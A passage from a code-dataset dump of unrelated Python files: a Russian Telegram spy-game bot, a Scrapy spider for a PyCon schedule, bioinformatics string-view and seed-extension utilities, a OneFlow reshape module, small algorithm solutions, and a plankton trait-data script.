игре!')\n return\n im = 0\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['id'] == m.reply_to_message.from_user.id:\n im = i\n break\n temp_role = games[game_id]['players'][im]['role']\n games[chat]['players'].remove(\n createuser(temp_role, m.reply_to_message.from_user.id, m.reply_to_message.from_user.first_name))\n games[chat]['roles'].remove(temp_role)\n games[chat]['users'].remove(m.reply_to_message.from_user.id)\n bot.send_message(chat, rusificate[temp_role] + ' ' + m.reply_to_message.from_user.first_name + ' удалился из игры!')\n\n\n@bot.message_handler(commands=['startgame'])\ndef start_game(m):\n if m.from_user.id != creator:\n return\n game_id = m.chat.id\n game_exists = False\n for i in games.keys():\n if game_id == i:\n game_exists = True\n break\n if not game_exists:\n bot.send_message(m.chat.id, 'Игра еще не создана!')\n return\n games[game_id]['active'] = True\n for i in range(len(games[game_id]['users'])):\n desc = roles[games[game_id]['roles'][i]]['desc']\n if games[game_id]['players'][i]['spy']:\n desc += roles[games[game_id]['roles'][i]]['spy']\n else:\n desc += roles[games[game_id]['roles'][i]]['no_spy']\n bot.send_message(games[game_id]['users'][i], desc)\n bot.send_message(m.chat.id, 'Генерал выбирает где спрятать коды, пока работники еще спят...')\n general_id = games[game_id]['players'][0]['id']\n kb = types.InlineKeyboardMarkup()\n btns = list()\n btns2 = list()\n for cab in games[game_id]['cabinets']:\n if cab in [301, 302, 303, 304, 305]:\n btns.append(\n types.InlineKeyboardButton(cab, callback_data='first_hide_code_in {} {}'.format(cab, game_id)))\n elif cab in [201, 202, 203, 204, 205]:\n btns2.append(\n types.InlineKeyboardButton(cab, callback_data='first_hide_code_in {} {}'.format(cab, game_id)))\n kb.add(*btns)\n kb.add(*btns2)\n bot.send_message(general_id, 'Выберете, где спрячете коды...', reply_markup=kb)\n\n\n@bot.callback_query_handler(lambda c: True)\ndef callback_handler(c):\n text = c.data.split()\n action = text[0]\n game_id = text[2]\n game_id = int(game_id)\n game_exists = False\n for i in games.keys():\n if game_id == i:\n game_exists = True\n break\n if not game_exists and not games[game_id]['active']:\n return\n if action == 'first_hide_code_in':\n cab_num = int(text[1])\n turn = games[game_id]['turn']\n games[game_id]['turn'] = turn + 1\n games[game_id]['codes'] = cab_num\n bot.edit_message_text('Вы спрятали коды в {} кабинете.'.format(cab_num), c.message.chat.id,\n c.message.message_id)\n bot.send_message(game_id, 'Генерал ' + c.from_user.first_name + ' спрятал коды!')\n next_turn(game_id)\n return\n elif action == 'nothing':\n bot.edit_message_text('Вы решили сегодня отдыхать.', c.message.chat.id, c.message.message_id)\n return\n elif action == 'steal_a_card':\n kb = types.InlineKeyboardMarkup()\n btns = []\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['name'] != c.from_user.first_name:\n btns.append(types.InlineKeyboardButton(games[game_id]['players'][i]['name'],\n callback_data='2_steal_a_card {} {}'.format(str(i),\n game_id)))\n kb.add(*btns)\n bot.edit_message_text('У кого вы хотите украсть карточку доступа?', c.message.chat.id, c.message.message_id,\n reply_markup=kb)\n return\n elif action == '2_steal_a_card':\n user = int(text[1])\n im = 0\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['name'] == c.from_user.first_name:\n im = i\n break\n games[game_id]['players'][im]['al'] += games[game_id]['players'][user]['al']\n if games[game_id]['players'][im]['al'] > 3:\n games[game_id]['players'][im]['al'] = 3\n tts = 'Вы украли карточку доступа у {}. Теперь ваш уровень доступа: {}!'.format(\n games[game_id]['players'][user]['name'], str(games[game_id]['players'][im]['al']))\n bot.edit_message_text(tts, c.message.chat.id, c.message.message_id)\n games[game_id]['history'] += 'Сегодня у {} украли карточку доступа!\\n'.format(\n games[game_id]['players'][user]['name'])\n games[game_id]['acts'].append(\n 'Вы узнали, что {} украл карту доступа у {}!'.format(games[game_id]['players'][im]['name'],\n games[game_id]['players'][user]['name']))\n return\n elif action == 'see':\n im = 0\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['name'] == c.from_user.first_name:\n im = i\n break\n games[game_id]['players'][im]['see'] = True\n bot.edit_message_text('Сегодня вы решили подсматривать.', c.message.chat.id, c.message.message_id)\n return\n elif action == 'hear':\n im = 0\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['name'] == c.from_user.first_name:\n im = i\n break\n games[game_id]['players'][im]['see'] = True\n bot.edit_message_text('Сегодня вы решили слушать.', c.message.chat.id, c.message.message_id)\n return\n elif action == 'go_to_cabinet':\n im = 0\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['name'] == c.from_user.first_name:\n im = i\n break\n kb = types.InlineKeyboardMarkup()\n btns = []\n for i in games[game_id]['cabinets']:\n if int(str(i)[0]) <= games[game_id]['players'][im]['al']:\n btns.append(types.InlineKeyboardButton(str(i), callback_data='2_go_to_cabinet {} {}'.format(str(i),\n game_id)))\n kb.add(*btns)\n bot.edit_message_text('В какой кабинет вы хотите пойти?', c.message.chat.id, c.message.message_id,\n reply_markup=kb)\n return\n elif action == '2_go_to_cabinet':\n cab = int(text[1])\n im = 0\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['name'] == c.from_user.first_name:\n im = i\n break\n if cab == games[game_id]['codes']:\n if games[game_id]['players'][im]['spy']:\n tts = 'Шпион {} нашел коды в {} кабинете! Он выиграл!'.format(games[game_id]['players'][im]['name'],\n str(cab))\n del games[game_id]\n bot.send_message(game_id, tts)\n bot.edit_message_text(tts, c.message.chat.id, c.message.message_id)\n else:\n games[game_id]['acts'].append(\n 'Вы узнали, что {} ходил в {} кабинет!'.format(games[game_id]['players'][im]['name'],\n str(cab)))\n games[game_id]['players'][im]['memory'] += 'Вы ничего не нашли в {} кабинете.'.format(str(cab))\n ptts = 'Вы собираетесь искать в {} кабинете.'.format(str(cab))\n bot.edit_message_text(ptts, c.message.chat.id, c.message.message_id)\n return\n elif action == 'arrest':\n kb = types.InlineKeyboardMarkup()\n btns = []\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['name'] != c.from_user.first_name:\n btns.append(types.InlineKeyboardButton(games[game_id]['players'][i]['name'],\n callback_data='2_arrest {} {}'.format(str(i), game_id)))\n kb.add(*btns)\n bot.edit_message_text('Кого вы хотите посадить в тюрьму?', c.message.chat.id, c.message.message_id,\n reply_markup=kb)\n return\n elif action == '2_arrest':\n kb = types.InlineKeyboardMarkup()\n btns = []\n for i in range(len(games[game_id]['users'])):\n if games[game_id]['players'][i]['name'] != c.from_user.first_name:\n btns.append(types.InlineKeyboardButton(games[game_id]['players'][i]['name'],\n callback_data='2_arrest {} {}'.format(str(i), game_id)))\n kb.add(*btns)\n tts = 'Вы аррестовали {}!'\n bot.edit_message_text(tts, c.message.chat.id, c.message.message_id)\n return\n\n\ndef next_turn(game_id):\n game_exists = False\n for i in games.keys():\n if game_id == i:\n game_exists = not game_exists\n if games[game_id]['active'] and game_exists:\n turn = games[game_id]['turn']\n workers = ''\n for i in range(len(games[game_id]['users'])):\n name = games[game_id]['players'][i]['name']\n role = rusificate[games[game_id]['players'][i]['role']]\n workers += '{} {}\\n'.format(role, name)\n tts = 'День {}. У вас есть 60 секунд на ход и обсуждение ситуации...\\n\\n{}\\nТекущие работники:\\n{}'.format(\n str(turn), games[game_id]['history'], workers)\n bot.send_message(game_id, tts)\n games[game_id]['history'] = ''\n for i in range(len(games[game_id]['users'])):\n kb = types.InlineKeyboardMarkup()\n btns = []\n h = games[game_id]['players'][i]['actions']\n user = games[game_id]['players'][i]['id']\n role = games[game_id]['players'][i]['role']\n for ids in h:\n btns.append(\n types.InlineKeyboardButton(rusificate[ids],\n callback_data='{} {} {}'.format(ids, str(user), str(game_id))))\n kb.add(*btns)\n if games[game_id]['players'][i]['see']:\n if games[game_id]['acts']:\n bot.send_message(user, random.choice(games[game_id]['acts']))\n else:\n bot.send_message(user, 'Вам ничего не удалось услышать!')\n games[game_id]['players'][i]['see'] = False\n if games[game_id]['players'][i]['memory'] != '':\n bot.send_message(user, games[game_id]['players'][i]['memory'])\n games[game_id]['players'][i]['memory'] = ''\n if not games[game_id]['players'][i]['arrested']:\n tts = 'Что вы будете делать сегодня, {}?\\n\\nВаш уровень доступа: {}.'.format(rusificate[role],\n games[game_id]['players'][\n i]['al'])\n bot.send_message(user, tts, reply_markup=kb)\n else:\n bot.send_message(user, 'Сегодня вы играли с бананом в тюрьме.', reply_markup=kb)\n games[game_id]['acts'] = []\n games[game_id]['turn'] = turn + 1\n threading.Timer(60, next_turn, [game_id]).start()\n else:\n return\n\n\ndef creategame():\n return {\n 'players': [],\n 'cabinets': [100, 101, 102, 103, 104, 105, 200, 201, 202, 203, 204, 205, 300, 301, 302, 303, 304, 305],\n 'codes': None,\n 'roles': [],\n 'users': [],\n 'spy': None,\n 'turn': 0,\n 'history': '',\n 'acts': [],\n 'active': False,\n }\n\n\ndef createuser(role, user, name, spy='None'):\n return {\n 'id': user,\n 'name': name,\n 'role': role,\n 'cabinet': roles[role]['cabinet'],\n 'al': roles[role]['al'],\n 'actions': roles[role]['actions'],\n 'spy': spy,\n 'see': False,\n 'memory': '',\n 'arrested': False\n }\n\n\nboottext = bot.get_me().username + ' is started!'\nprint(boottext.capitalize())\nbot.polling(none_stop=True, timeout=600)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":19998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"459610049","text":"\n\n\n\nimport re\n\nimport scrapy\nfrom scrapy import Selector\n\nfrom ..Months import Months\n\nfrom ..items import PyconItem\n\n\nclass PyconSpider(scrapy.Spider):\n name = \"pycon\"\n start_urls = [\n 'https://2017.es.pycon.org/ca/schedule/',\n ]\n\n # Xpaths\n container_xpath = '//div[contains(@class, \"schedule\")]/div'\n date_xpath = './div[contains(@class, \"day\")]'\n slot_xpath = './div[contains(@class, \"slot-intermediate\") or contains(@class, \"slot-basic\") or contains(@class, \"slot-advanced\")]'\n\n # Xpath inside slot\n slot_level_xpath = './@class'\n inner_xpath = './/div[@class=\"slot-inner\"]'\n slot_id_xpath = inner_xpath + '/@data-slot'\n slot_hour_xpath = inner_xpath + '/strong/text()'\n slot_type_xpath = inner_xpath + '/span[@class=\"slot-kind\"]/text()'\n slot_title_xpath = inner_xpath + '/h3/a/text()'\n slot_url_xpath = inner_xpath + '/h3/a/@href'\n slot_language_xpath = inner_xpath + '/h3/a/small/text()'\n slot_speakers_xpath = inner_xpath + '/p/strong/text()'\n slot_room_xpath = inner_xpath + '/p[contains(@class, \"default-room\")]/text()'\n slot_description_xpath = '//div[@id=\"slot-description-{}\"]//p/text()'\n\n\n def __init__(self, tor=None, *args, **kwargs):\n super(PyconSpider, self).__init__(*args, **kwargs)\n self.tor = tor\n \"\"\"\n import sys\n sys.path.append('/home/jordi/opt/scrapy_pycon/pycharm-debug.egg')\n import pydevd\n pydevd.settrace('localhost', port=7502, stdoutToServer=True, stderrToServer=True)\n \"\"\"\n def parse(self, response):\n sel = Selector(response)\n divs_schedule = sel.xpath(self.container_xpath)\n\n items = []\n slot_date = ''\n for div_schedule in divs_schedule:\n # Check if current div is a \"date div\" and get the date\n if self.is_date(div_schedule):\n slot_date = self.get_date(div_schedule)\n\n # Check if current div is a slot and get their data\n if self.is_slot(div_schedule):\n for slot in div_schedule.xpath(self.slot_xpath):\n items.append(self.get_slot(slot, slot_date))\n\n return items\n\n\n def is_date(self, sel):\n \"\"\"\n If given selector is a date return True.\n :param sel: Selector\n :return: Boolean\n \"\"\"\n return True if sel.xpath(self.date_xpath) else False\n\n def is_slot(self, sel):\n \"\"\"\n\n :param sel: Selector\n :return: Boolean\n \"\"\"\n return True if sel.xpath(self.slot_xpath) else False\n\n def get_date(self, sel):\n \"\"\"\n Return string with date from selector\n :param sel: Selector\n :return: String\n \"\"\"\n date = sel.xpath(self.date_xpath + '/h2/text()')\n if date:\n date_str = date.extract_first()\n # Transform text date to iso date (YYYY-MM-DD)\n date_re = re.search('(?P\\d{2}) de (?P\\w+) de (?P\\d{4})', date_str)\n if date_re:\n day = date_re.group('day')\n month_str = date_re.group('month')\n year = date_re.group('year')\n month = Months.get_month_number(month_str)\n return '{}-{}-{}'.format(year, month, day)\n raise Exception(\"The date can't be gotten\")\n\n def get_slot(self, sel, date):\n \"\"\"\n\n :param sel: Selector\n :param date: String\n :return: PyconItem\n \"\"\"\n item = PyconItem()\n\n item['level'] = self.get_level(sel)\n item['id'] = sel.xpath(self.slot_id_xpath).extract_first()\n item['hour'] = sel.xpath(self.slot_hour_xpath).extract_first()\n item['type'] = sel.xpath(self.slot_type_xpath).extract_first()\n item['title'] = sel.xpath(self.slot_title_xpath).extract_first().strip()\n item['lang'] = sel.xpath(self.slot_language_xpath).extract_first().strip()\n item['speakers'] = sel.xpath(self.slot_speakers_xpath).extract_first().strip()\n item['room'] = sel.xpath(self.slot_room_xpath).extract_first().strip()\n item['description'] = sel.xpath(self.slot_description_xpath.format(item['id'])).extract_first().strip()\n item['date'] = date\n\n \"\"\"\n slot_url = sel.xpath(self.slot_room_xpath).extract_first().strip()\n if slot_url is not None:\n next_page = response.urljoin(slot_url)\n yield scrapy.Request(next_page, callback=self.parse_slot_detail)\n \"\"\"\n\n return item\n\n def get_level(self, sel):\n \"\"\"\n\n :param sel: Selector\n :return:\n \"\"\"\n slot_class = sel.xpath(self.slot_level_xpath)\n if 'basic' in slot_class:\n return 'basic'\n elif 'intermediate' in slot_class:\n return 'intermediate'\n else:\n return 'advanced'\n\n # def parse_slot_detail(self, response):","sub_path":"pycon/spiders/pycon_spider.py","file_name":"pycon_spider.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"424715825","text":"import pandas as pd\nimport numpy as np\n\ndata = pd.read_csv(\"final_predictions_lstm_glove1_all_folds.csv\")\ndata.columns = [\"index\", \"problem_log_id\", \"grader_teacher_id\", \"grade_1_prob_all\", \"grade_2_prob_all\", \"grade_3_prob_all\", \"grade_4_prob_all\", \"grade_5_prob_all\" ]\ndata = data.drop(columns=[\"index\"])\ndata = data.astype({'problem_log_id': 'int64'}, copy=True)\ndata = data.astype({'grader_teacher_id': 'int64'}, copy=True)\n\nprint(data)\ndata.to_csv(\"predictions_lstm_glove1_all_folds.csv\")","sub_path":"clean_df.py","file_name":"clean_df.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"561001516","text":"from __future__ import annotations\n\nfrom math import ceil\nfrom typing import TypeVar\n\n\nclass StringView:\n __slots__ = ('start', 'stop', 'data', '_hash_val')\n\n @staticmethod\n def wrap(data: str) -> StringView:\n return StringView(0, len(data), data)\n\n @staticmethod\n def empty() -> StringView:\n return StringView.wrap('')\n\n def startswith(self, prefix: str | StringView):\n if len(self) < len(prefix):\n return False\n for i in range(len(prefix)):\n if self[i] != prefix[i]:\n return False\n return True\n\n def endswith(self, suffix: str | StringView):\n if len(self) < len(suffix):\n return False\n for i in range(len(suffix)):\n if self[len(self) - i - 1] != suffix[i]:\n return False\n return True\n\n def __init__(self, start: int, stop: int, data: str):\n self.start = start\n self.stop = stop\n self.data = data\n self._hash_val = None\n\n def __len__(self):\n return self.stop - self.start\n\n def __getitem__(self, item):\n if isinstance(item, slice):\n if item.step is not None and item.step > 1:\n raise ValueError('Only step size of 1 allowed')\n # start\n if item.start is None:\n new_start = self.start\n elif item.start < 0:\n new_start = self.stop + item.start\n else:\n new_start = self.start + item.start\n # stop\n if item.stop is None:\n new_stop = self.stop\n elif item.stop < 0:\n new_stop = self.stop + item.stop\n else:\n new_stop = self.start + item.stop\n # oob check\n if new_start < self.start:\n new_start = self.start\n if new_stop > self.stop:\n new_stop = self.stop\n # return\n return StringView(new_start, new_stop, self.data)\n elif isinstance(item, int):\n if item < 0:\n i = self.stop + item\n return StringView(i, i + 1, self.data)\n else:\n i = self.start + item\n return StringView(i, i + 1, self.data)\n else:\n raise ValueError('Unsupported')\n\n def __contains__(self, key: str | StringView):\n if len(key) == 0:\n return True\n elif len(key) > 1:\n raise ValueError('Single character values only')\n return any(str(ch) == key for i, ch in enumerate(self))\n\n def __str__(self):\n return self.data[self.start:self.stop]\n\n def __repr__(self):\n return str(self)\n\n def __iter__(self):\n return (StringView(i, i+1, self.data) for i in range(self.start, self.stop))\n\n def __eq__(self, other: StringView | str):\n if not(isinstance(other, str) or isinstance(other, StringView)):\n return False\n if len(self) != len(other):\n return False\n for ch1, ch2 in zip(self, other):\n if str(ch1) != str(ch2):\n return False\n return True\n\n def __hash__(self):\n if self._hash_val is not None:\n return self._hash_val\n ret = 0\n for i, sv in enumerate(self):\n ret ^= hash((i, str(sv)))\n self._hash_val = ret\n return self._hash_val\n\n def __lt__(self, other: StringView | str):\n for ch1, ch2 in zip(self, other):\n if str(ch1) < str(ch2):\n return True\n if len(self) < len(other):\n return True\n return False\n\n def __add__(self, other: StringView | str):\n return StringView.wrap(str(self) + str(other))\n\n def __mul__(self, other: int):\n return StringView.wrap(str(self) * other)\n\n\n\n\n\nclass RotatedStringView:\n __slots__ = ('start', 'data')\n\n @staticmethod\n def wrap(data: str) -> RotatedStringView:\n return RotatedStringView(0, data)\n\n def __init__(self, start: int, data: str):\n self.start = start\n self.data = data\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, item):\n if isinstance(item, int):\n if item >= len(self.data) or -(item + 1) >= len(self.data):\n raise ValueError(f'OOB {item}')\n if item > 0:\n return self.data[(self.start + item) % len(self.data)]\n else:\n return self.data[(self.start + item) % len(self.data)]\n else:\n raise ValueError('Unsupported')\n\n def __iter__(self):\n return (self.data[(self.start + i) % len(self.data)] for i in range(len(self.data)))\n\n def __str__(self):\n return ''.join(ch for ch in self)\n\n def __repr__(self):\n return str(self)\n\n def __lt__(self, other: RotatedStringView | str):\n for ch1, ch2 in zip(self, other):\n if str(ch1) < str(ch2):\n return True\n if len(self) < len(other):\n return True\n return False\n\n def __eq__(self, other: RotatedStringView | str):\n if not(isinstance(other, str) or isinstance(other, RotatedStringView)):\n return False\n if len(self) != len(other):\n return False\n for ch1, ch2 in zip(self, other):\n if str(ch1) != str(ch2):\n return False\n return True\n\n\n\n\n\nT = TypeVar('T')\n\n\nclass RotatedListView:\n __slots__ = ('start', 'data')\n\n @staticmethod\n def wrap(data: list[T]) -> RotatedListView:\n return RotatedListView(0, data)\n\n def __init__(self, start: int, data: list[T]):\n self.start = start\n self.data = data\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, item):\n if isinstance(item, int):\n if item >= len(self.data) or -(item + 1) >= len(self.data):\n raise ValueError(f'OOB {item}')\n if item > 0:\n return self.data[(self.start + item) % len(self.data)]\n else:\n return self.data[(self.start + item) % len(self.data)]\n else:\n raise ValueError('Unsupported')\n\n def __iter__(self):\n return (self.data[(self.start + i) % len(self.data)] for i in range(len(self.data)))\n\n def __str__(self):\n return ''.join(str(e) for e in self)\n\n def __repr__(self):\n return str(self)\n\n def __lt__(self, other: RotatedListView | list[T]):\n for ch1, ch2 in zip(self, other):\n if str(ch1) < str(ch2):\n return True\n if len(self) < len(other):\n return True\n return False\n\n def __eq__(self, other: RotatedListView | list[T]):\n if not(isinstance(other, str) or isinstance(other, RotatedListView)):\n return False\n if len(self) != len(other):\n return False\n for ch1, ch2 in zip(self, other):\n if str(ch1) != str(ch2):\n return False\n return True\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n x = RotatedStringView(1, 'ABCDEF')\n print(f'{x}')\n# print(f'{x[0]}')\n# print(f'{x[1]}')\n# print(f'{x[2]}')\n# print(f'{x[3]}')\n# print(f'{x[4]}')\n# print(f'{x[5]}')\n# print()\n# print(f'{x[0]}')\n# print(f'{x[-5]}')\n# print(f'{x[-4]}')\n# print(f'{x[-3]}')\n# print(f'{x[-2]}')\n# print(f'{x[-1]}')\n\n\n\n\n\n\n\n\n\n# MARKDOWN\nS = TypeVar('S', StringView, str)\n\n\ndef to_seeds(\n seq: S,\n mismatches: int\n) -> list[S]:\n seed_cnt = mismatches + 1\n len_per_seed = ceil(len(seq) / seed_cnt)\n ret = []\n for i in range(0, len(seq), len_per_seed):\n capture_len = min(len(seq) - i, len_per_seed)\n ret.append(seq[i:i+capture_len])\n return ret\n\n\ndef seed_extension(\n test_sequence: S,\n found_seq_idx: int,\n found_seed_idx: int,\n seeds: list[S]\n) -> tuple[int, int] | None:\n prefix_len = sum(len(seeds[i]) for i in range(0, found_seed_idx))\n start_idx = found_seq_idx - prefix_len\n if start_idx < 0:\n return None # report out-of-bounds\n seq_idx = start_idx\n dist = 0\n for seed in seeds:\n block = test_sequence[seq_idx:seq_idx + len(seed)]\n if len(block) < len(seed):\n return None # report out-of-bounds\n dist += hamming_distance(seed, block)\n seq_idx += len(seed)\n return start_idx, dist\n# MARKDOWN\n\n\ndef hamming_distance(kmer1: S, kmer2: S) -> int:\n mismatch = 0\n for ch1, ch2 in zip(kmer1, kmer2):\n if ch1 != ch2:\n mismatch += 1\n return mismatch","sub_path":"docs/data/learn/Bioinformatics/input/ch9_code/src/sequence_search/SearchUtils.py","file_name":"SearchUtils.py","file_ext":"py","file_size_in_byte":8586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"152575375","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport oneflow as flow\nfrom oneflow.python.nn.module import Module\nfrom oneflow.python.oneflow_export import oneflow_export, experimental_api\nfrom oneflow.python.framework.tensor import register_tensor_op\nfrom typing import Sequence\nfrom functools import reduce\nimport operator\n\n\ndef infer_shape(x, shape):\n dim_index_need_infer = shape.index(-1) if shape.count(-1) == 1 else None\n in_elem_cnt = reduce(operator.mul, x.shape, 1)\n out_elem_cnt = reduce(operator.mul, shape, 1)\n if dim_index_need_infer is not None:\n assert (in_elem_cnt % out_elem_cnt) == 0\n shape[dim_index_need_infer] = int(abs(in_elem_cnt / out_elem_cnt))\n else:\n assert in_elem_cnt == out_elem_cnt\n return shape\n\n\nclass Reshape(Module):\n def __init__(self, shape: Sequence[int]) -> None:\n super().__init__()\n\n assert isinstance(shape, tuple) or isinstance(shape, list)\n shape = list(shape)\n assert all(dim == -1 or dim > 0 for dim in shape)\n assert shape.count(-1) <= 1\n self.shape = shape\n\n def forward(self, x):\n new_shape = infer_shape(x, self.shape)\n return flow.F.reshape(x, shape=new_shape)\n\n\n@oneflow_export(\"reshape\")\n@register_tensor_op(\"reshape\")\n@experimental_api\ndef reshape_op(x, shape: Sequence[int] = None):\n \"\"\"This operator reshapes a Tensor.\n\n We can set one dimension in `shape` as `-1`, the operator will infer the complete shape.\n\n Args:\n x: A Tensor.\n shape: Shape of the output tensor.\n Returns:\n A Tensor has the same type as `x`.\n\n For example:\n\n .. code-block:: python\n\n >>> import numpy as np\n >>> import oneflow.experimental as flow\n >>> flow.enable_eager_execution()\n\n >>> x = np.array(\n ... [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]]\n ... ).astype(np.float32)\n >>> input = flow.Tensor(x)\n\n >>> y = flow.reshape(input, shape=[2, 2, 2, -1]).numpy().shape\n >>> print(y)\n (2, 2, 2, 2)\n\n \"\"\"\n return Reshape(shape=shape)(x)\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod(raise_on_error=True)\n","sub_path":"oneflow-master-zj/oneflow/python/nn/modules/reshape.py","file_name":"reshape.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"410957553","text":"# https://cityofsalinas.opendatasoft.com/pages/developers/\n\nimport requests, json\n\n# use the search API to request data from the 'collisions' dataset\ndataParams = {\n 'dataset':'collisions', # specify dataset identifier\n 'format':'json', # specify json format\n 'q' : 'objectid = 1503' # do a full text query for objectid = 1503\n}\n\n# send the post request\np = requests.post('https://cityofsalinas.opendatasoft.com/api/records/1.0/download/', data=dataParams)\njson_data = json.loads(p.text) # read the response as JSON\n\n# print the data in the resulting record\nfor key in json_data[0]['fields']:\n print('{} : {}'.format(key, json_data[0]['fields'][key]))","sub_path":"python/REST/test_requests.py","file_name":"test_requests.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"375231327","text":"# class UnionFind():\n# def __init__(self, n):\n# self.n = n\n# self.parents = [-1] * n\n\n# def find(self, x):\n# if self.parents[x] < 0:\n# return x\n# else:\n# self.parents[x] = self.find(self.parents[x])\n# return self.parents[x]\n\n# def union(self, x, y):\n# x = self.find(x)\n# y = self.find(y)\n\n# if x == y:\n# return\n\n# if self.parents[x] > self.parents[y]:\n# x, y = y, x\n\n# self.parents[x] += self.parents[y]\n# self.parents[y] = x\n\n# def size(self, x):\n# return -self.parents[self.find(x)]\n\n# def same(self, x, y):\n# return self.find(x) == self.find(y)\n\n# def members(self, x):\n# root = self.find(x)\n# return [i for i in range(self.n) if self.find(i) == root]\n\n# def roots(self):\n# return [i for i, x in enumerate(self.parents) if x < 0]\n\n# def group_count(self):\n# return len(self.roots())\n\n# def all_group_members(self):\n# return {r: self.members(r) for r in self.roots()}\n\n# def __str__(self):\n# return '\\n'.join('{}: {}'.format(r, self.members(r)) for r in self.roots())\n\nclass UnionFind():\n par = []\n sizes = []\n\n def __init__(self, N):\n self.par = [i for i in range(N)]\n self.sizes = [1 for _ in range(N)]\n\n def root(self, x: int)-> int:\n if (self.par[x] == x):\n return x\n self.par[x] = self.root(self.par[x])\n return self.par[x]\n\n def unite(self, x: int, y: int):\n rootX = self.root(x)\n rootY = self.root(y)\n if rootX == rootY:\n return\n self.par[rootX] = rootY\n self.sizes[rootY] += self.sizes[rootX]\n\n def maxSize(self)-> int:\n return max(self.sizes)\n\ndef friends(N, As):\n uf = UnionFind(N)\n setAs = list(set(As))\n for val in setAs:\n uf.unite(val[0]-1, val[1]-1)\n # ans = 0\n ans = uf.maxSize()\n # for i in range(N):\n # temp = uf.size(i)\n # if ans < temp:\n # ans = temp\n return ans\n\nif __name__ == \"__main__\":\n nm = list(map(int, input().split()))\n As =[tuple(map(int, input().split())) for _ in range(nm[1])]\n print(friends(nm[0], As))","sub_path":"Python_codes/p02573/s582398934.py","file_name":"s582398934.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"32762708","text":"# Time Complexity : O(n**2)\n# Space Complexity : O(1)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : Unique values in result list\n\nclass Solution(object):\n def threeSum(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n nums.sort()\n # print(nums)\n retList = []\n for i in range(len(nums)-2):\n if i > 0 and nums[i] == nums[i-1]:\n continue\n left = i + 1\n right = len(nums) - 1\n while left < right:\n summ = nums[i] + nums[left] + nums[right]\n # print(summ)\n if summ < 0:\n left += 1\n elif summ > 0:\n right -= 1\n else:\n retList.append([nums[i], nums[left], nums[right]])\n while left < right and nums[left] == nums[left + 1]:\n left = left + 1\n while left < right and nums[right] == nums[right - 1]:\n right = right - 1\n left += 1\n right -= 1\n return retList\n ","sub_path":"3Sum.py","file_name":"3Sum.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"329641002","text":"import numpy as np\nimport pandas as pd\nfrom scipy.stats import linregress\nimport warnings\n\nimport phytoplankton_traits as pt\n\n# traits relevant for pyhtoplankton growth rates\nzoop_traits = [\"size_Z\", \"mu_Z\", \"c_Z\", \"m_Z\", \"k_Z\"]\n\n# to store empirically measured data\nraw_data = pd.DataFrame(columns = zoop_traits) \nallo_scal = {} # allometric scaling parameters\n\n########################\n# growth rates\ngrowth = pd.read_csv(\"empirical_data/growth_rates_brun2017.csv\",\n encoding = 'ISO-8859-1')\ngrowth = growth[[\"Body mass (mg)\", \"Specific growth (15°C)\"]]\ngrowth.columns = [\"size_Z\", \"mu_Z\"]\n\n\n# unit conversions used\n# mum^3 = 1e-18 m^3 =1e-18 (1e3 kg) = 1e-18 (1e3 *1e6 mg) = 1e-9 mg\nuc = {\"ml_L\": 1000,\n \"h_day\": 24, # hours in a day\n \"mum3_mg\": 1e-9 }\n\n# unit conversion (data is reported as per day, but comparison with\n# Kiorboe 2014 shows that this is not the case, but as per hour)\ngrowth.mu_Z *= uc[\"h_day\"]\n\n# log transform data\ngrowth = np.log(growth)\ngrowth = growth[np.isfinite(growth.mu_Z)]\n\nallo_scal[\"mu_Z\"] = 0\n\n########################\n# clearance rate data\nclear = pd.read_csv(\"empirical_data/clearance_rates_brun2017.csv\",\n encoding = 'ISO-8859-1')\nclear = clear[[\"Body mass (mg)\", \"Fmax (15°C)\"]]\nclear.columns = [\"size_Z\", \"c_Z\"]\n#change clearance rate from ml to \\mul\nclear = np.log(clear)\n\nallo_scal[\"c_Z\"] = 1\n\n########################\nmortality = pd.read_csv(\"empirical_data/Hirst_Kiorboe_2002.csv\")\nmortality[\"size_Z\"] /= 1000 # convert \\mug to mg\nmortality[\"size_Z\"] *= 0.1 # convert DV 